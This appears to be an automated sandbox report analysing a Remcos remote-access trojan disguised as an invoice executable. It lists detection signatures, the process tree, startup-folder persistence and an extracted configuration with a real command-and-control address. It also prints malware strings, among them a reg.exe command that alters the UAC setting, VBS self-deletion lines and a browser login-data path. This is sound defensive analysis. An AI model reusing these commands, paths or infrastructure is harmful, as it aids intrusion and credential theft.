
Windows Analysis Report
z49FACTURA-0987678.exe

Overview

General Information

Sample name: z49FACTURA-0987678.exe
Analysis ID: 1567452
MD5: 876f47f33c5975497c15bf24d50952b5
SHA1: a47579ea0e5d47ceb89cbb3450f4c482768a0bf8
SHA256: 49e8a1f12fb5202470604efe01c0d60949d20d302a76aed85b2a049e91266366
Tags: exe, user-Porcupine

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • z49FACTURA-0987678.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\z49FACTURA-0987678.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
    • turbinals.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\z49FACTURA-0987678.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
      • turbinals.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Local\acceptancy\turbinals.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
        • turbinals.exe (PID: 7940 cmdline: C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\ntpiwvxpqbhwumsvyl" MD5: 876F47F33C5975497C15BF24D50952B5)
        • turbinals.exe (PID: 7960 cmdline: C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\pvdaxohiejzjxsohpwwof" MD5: 876F47F33C5975497C15BF24D50952B5)
        • turbinals.exe (PID: 7976 cmdline: C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\apitxysksrrohzclyhjpqrrk" MD5: 876F47F33C5975497C15BF24D50952B5)
  • wscript.exe (PID: 8056 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • turbinals.exe (PID: 8108 cmdline: "C:\Users\user\AppData\Local\acceptancy\turbinals.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
      • turbinals.exe (PID: 8124 cmdline: "C:\Users\user\AppData\Local\acceptancy\turbinals.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
        • turbinals.exe (PID: 8144 cmdline: "C:\Users\user\AppData\Local\acceptancy\turbinals.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
          • turbinals.exe (PID: 4984 cmdline: "C:\Users\user\AppData\Local\acceptancy\turbinals.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["192.210.150.26:8787:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R1T905", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000003.00000002.3758537352.00000000014B8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
(75 entries in the full report)
Source | Rule | Description | Author | Strings
13.2.turbinals.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
13.2.turbinals.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
13.2.turbinals.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
13.2.turbinals.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
13.2.turbinals.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
(91 entries in the full report)

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" , ProcessId: 8056, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" , ProcessId: 8056, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, ProcessId: 7720, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, ProcessId: 7744, TargetFilename: C:\ProgramData\remcos\logs.dat
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-03T15:40:12.448808+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49703 | 192.210.150.26 | 8787 | TCP
2024-12-03T15:40:13.609424+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 192.210.150.26 | 8787 | 192.168.2.10 | 49703 | TCP
2024-12-03T15:42:38.466482+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 192.210.150.26 | 8787 | 192.168.2.10 | 49703 | TCP
2024-12-03T15:40:16.569413+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.10 | 49710 | 178.237.33.50 | 80 | TCP



AV Detection

Source: 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.26:8787:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R1T905", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | ReversingLabs: Detection: 26%
Source: z49FACTURA-0987678.exe | ReversingLabs: Detection: 26%
Source: Yara match | File source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3758537352.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3761526456.000000000402F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1465257785.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Joe Sandbox ML: detected
Source: z49FACTURA-0987678.exe | Joe Sandbox ML: detected
Source: turbinals.exe, 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match | File source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTR
Source: z49FACTURA-0987678.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F3445A
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3C6D1 FindFirstFileW,FindClose,0_2_00F3C6D1
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F3C75C
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F3EF95
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F3F0F2
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F3F3F3
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F337EF
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F33B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F33B12
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F3BCBC
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_00D4445A
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4C6D1 FindFirstFileW,FindClose,2_2_00D4C6D1
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00D4C75C
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D4EF95
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D4F0F2
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D4F3F3
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00D437EF
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00D43B12
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D4BCBC

Networking

Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49703 -> 192.210.150.26:8787
Source: Network traffic | Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 192.210.150.26:8787 -> 192.168.2.10:49703
Source: Malware configuration extractor | IPs: 192.210.150.26
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:49710 -> 178.237.33.50:80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F422EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00F422EE
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: turbinals.exe, 00000005.00000003.1381036053.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: file://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: turbinals.exe, 00000005.00000003.1381036053.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: file://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
